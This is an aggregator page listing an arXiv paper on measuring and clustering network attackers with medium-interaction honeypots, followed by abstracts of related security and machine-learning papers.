Measuring and Clustering Network Attackers using Medium-Interaction
Honeypots
- URL: http://arxiv.org/abs/2206.13614v1
- Date: Mon, 27 Jun 2022 20:19:39 GMT
- Title: Measuring and Clustering Network Attackers using Medium-Interaction
Honeypots
- Authors: Zain Shamsi, Daniel Zhang, Daehyun Kyoung, Alex Liu
- Abstract summary: Honeypots are often used by information security teams to measure the threat landscape in order to secure their networks.
In this work, we deploy such honeypots on five different protocols on the public Internet and study the intent and sophistication of the attacks we observe.
We then use the information gained to develop a clustering approach that identifies correlations in attacker behavior to discover IPs that are highly likely to be controlled by a single operator.
- Score: 5.524750830120598
- License: http://creativecommons.org/licenses/by-sa/4.0/
- Abstract: Network honeypots are often used by information security teams to measure the
threat landscape in order to secure their networks. With the advancement of
honeypot development, today's medium-interaction honeypots provide a way for
security teams and researchers to deploy these active defense tools that
require little maintenance on a variety of protocols. In this work, we deploy
such honeypots on five different protocols on the public Internet and study the
intent and sophistication of the attacks we observe. We then use the
information gained to develop a clustering approach that identifies
correlations in attacker behavior to discover IPs that are highly likely to be
controlled by a single operator, illustrating the advantage of using these
honeypots for data collection.
Related papers
- Robust Federated Learning Mitigates Client-side Training Data Distribution Inference Attacks [48.70867241987739]
InferGuard is a novel Byzantine-robust aggregation rule aimed at defending against client-side training data distribution inference attacks.
The results of our experiments indicate that our defense mechanism is highly effective in protecting against client-side training data distribution inference attacks.
arXiv Detail & Related papers (2024-03-05T17:41:35Z) - A Survey and Comparative Analysis of Security Properties of CAN Authentication Protocols [92.81385447582882]
The Controller Area Network (CAN) bus leaves in-vehicle communications inherently non-secure.
This paper reviews and compares the 15 most prominent authentication protocols for the CAN bus.
We evaluate protocols based on essential operational criteria that contribute to ease of implementation.
arXiv Detail & Related papers (2024-01-19T14:52:04Z) - Graph Neural Networks for Decentralized Multi-Agent Perimeter Defense [111.9039128130633]
We develop an imitation learning framework that learns a mapping from defenders' local perceptions and their communication graph to their actions.
We run perimeter defense games in scenarios with different team sizes and configurations to demonstrate the performance of the learned network.
arXiv Detail & Related papers (2023-01-23T19:35:59Z) - Honeypot Implementation in a Cloud Environment [0.0]
This thesis presents a honeypot solution to investigate malicious activities in heiCLOUD.
To detect attackers in restricted network zones at Heidelberg University, a new concept to discover leaks in the firewall will be created.
A customized OpenSSH server that works as an intermediary instance will be presented.
arXiv Detail & Related papers (2023-01-02T15:02:54Z) - Network-Level Adversaries in Federated Learning [21.222645649379672]
We study the impact of network-level adversaries on training federated learning models.
We show that attackers dropping the network traffic from carefully selected clients can significantly decrease model accuracy on a target population.
We develop a server-side defense which mitigates the impact of our attacks by identifying and up-sampling clients likely to positively contribute towards target accuracy.
arXiv Detail & Related papers (2022-08-27T02:42:04Z) - RelaxLoss: Defending Membership Inference Attacks without Losing Utility [68.48117818874155]
We propose a novel training framework based on a relaxed loss with a more achievable learning target.
RelaxLoss is applicable to any classification model with added benefits of easy implementation and negligible overhead.
Our approach consistently outperforms state-of-the-art defense mechanisms in terms of resilience against MIAs.
arXiv Detail & Related papers (2022-07-12T19:34:47Z) - What are Attackers after on IoT Devices? An approach based on a
multi-phased multi-faceted IoT honeypot ecosystem and data clustering [11.672070081489565]
Honeypots have been historically used as decoy devices to help researchers gain a better understanding of the dynamic of threats on a network.
In this work, we presented a new approach to creating a multi-phased, multi-faceted honeypot ecosystem.
We were able to collect increasingly sophisticated attack data in each phase.
arXiv Detail & Related papers (2021-12-21T04:11:45Z) - HoneyCar: A Framework to Configure HoneypotVulnerabilities on the
Internet of Vehicles [5.248912296890883]
The Internet of Vehicles (IoV) has promising socio-economic benefits but also poses new cyber-physical threats.
Data on vehicular attackers can be realistically gathered through cyber threat intelligence using systems like honeypots.
We present HoneyCar, a novel decision support framework for honeypot deception.
arXiv Detail & Related papers (2021-11-03T17:31:56Z) - Learning Connectivity for Data Distribution in Robot Teams [96.39864514115136]
We propose a task-agnostic, decentralized, low-latency method for data distribution in ad-hoc networks using Graph Neural Networks (GNN)
Our approach enables multi-agent algorithms based on global state information to function by ensuring it is available at each robot.
We train the distributed GNN communication policies via reinforcement learning using the average Age of Information as the reward function and show that it improves training stability compared to task-specific reward functions.
arXiv Detail & Related papers (2021-03-08T21:48:55Z) - Adversarial Attacks On Multi-Agent Communication [80.4392160849506]
Modern autonomous systems will soon be deployed at scale, opening up the possibility for cooperative multi-agent systems.
Such advantages rely heavily on communication channels which have been shown to be vulnerable to security breaches.
In this paper, we explore such adversarial attacks in a novel multi-agent setting where agents communicate by sharing learned intermediate representations.
arXiv Detail & Related papers (2021-01-17T00:35:26Z) - Unleashing the Tiger: Inference Attacks on Split Learning [2.492607582091531]
We introduce general attack strategies targeting the reconstruction of clients' private training sets.
A malicious server can actively hijack the learning process of the distributed model.
We demonstrate our attack is able to overcome recently proposed defensive techniques.
arXiv Detail & Related papers (2020-12-04T15:41:00Z)
This list is automatically generated from the titles and abstracts of the papers in this site.
This site does not guarantee the quality of this site (including all information) and is not responsible for any consequences.